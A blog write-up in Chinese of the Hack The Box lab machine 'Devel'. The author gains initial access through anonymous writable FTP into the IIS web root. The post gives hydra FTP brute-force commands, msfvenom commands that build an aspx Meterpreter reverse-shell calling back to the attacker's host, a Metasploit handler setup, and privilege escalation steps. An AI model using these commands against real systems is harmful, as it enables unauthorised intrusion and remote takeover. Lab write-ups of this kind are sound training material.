Devel（ftp匿名登陆可读可写）

10.10.10.5

1
2
3

21/tcp open  ftp     Microsoft ftpd
80/tcp open  http    Microsoft IIS httpd 7.5

ftp

ftp 10.10.10.5
anonymous
03-18-17  01:06AM       <DIR>          aspnet_client
03-17-17  04:37PM                  689 iisstart.htm
01-11-19  01:21AM                 2826 shell.aspx
01-11-19  01:24AM                 2824 shell1.aspx
01-11-19  01:30AM                 2863 shell2.aspx
03-17-17  04:37PM               184946 welcome.png

get iisstart.htm
get shell.aspx
get shell1.aspx
get shell2.aspx
get welcome.png
cd aspnet_client
cd system_web
cd 2_0_50727
pwd
/aspnet_client/system_web/2_0_50727

下载并查看后，推测aspx脚本是服务器上要用的脚本，但看不出具体用途

web

http://10.10.10.5/aspnet_client/system_web/ 403 forbidden
You do not have permission to view this directory or page using the credentials that you supplied.

http://10.10.10.5/shell.aspx

trying1

当进行信息搜集了以后，发现ftp共享的目录就是web目录。

如果可以上传一个aspx类型的shell，通过web就可以获取webshell。

hydra -l server -P /usr/share/wordlists/rockyou.txt -I 10.10.10.5 ftp
hydra -l ftp -P /usr/share/wordlists/rockyou.txt -I 10.10.10.5 ftp

trying2: 生成一个aspx类型的shell。

msfvenom -l formats | grep asp
msfvenom -l payload | grep windows | grep meterpreter
msfvenom -p windows/x64/meterpreter_reverse_http LHOST="10.10.14.13" LPORT=7766 -o /root/Desktop/5/glory.aspx

ftp put上传

trying3: msf

设置监听

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST tun0
set LPORT 7766
run

失败

获取一个webshell

重新上传asp类型的一句话，然后菜刀连接。

whoami
iis apppool\web

net user
Administrator            babis                    Guest                    
The command completed with one or more errors.

权限不够，很多东西都看不了

错误的总结

以下的命令生成的payload不能成功执行。注意x64，是64位的windows，血泪的教训，会报一个错。
msfvenom -p windows/x64/meterpreter_reverse_http LHOST="10.10.14.13" LPORT=7766 -o /root/Desktop/5/glory.aspx

正确的方式：
msfvenom -p windows/meterpreter/reverse_tcp LHOST="10.10.14.13" LPORT=7765 -f aspx > /root/Desktop/5/4.aspx

一开始在生成格式中纠结，是生成asp类型，还是apsx类型？

asp和aspx的区别

asp是十几年前的产品。

aspx是asp的升级版，aspx整合了.net框架,不仅仅能做网页

关于`set ExitOnSession false`

因为handler application可以继续作为作业（job）运行，即使在关闭或失败的meterpreter会话的情况下也是如此。它仅适用于作业（-j），因为这些是在后台运行的唯一作业。

提权

windows提权，使用的方法，search suggester

1
2
3

shell
cd c:\Users\Administrator\Desktop
type root.txt.txt

总结：

这一次渗透还挺顺利的，因为用到的都是以前就学过的知识。

几乎立即就认识到了攻击路径。

还行吧，继续加油。

training

training windows port 21

Access（port:23-telnet登入反弹cmd） Previous

masscan结合python快速枚举批量主机端口 Next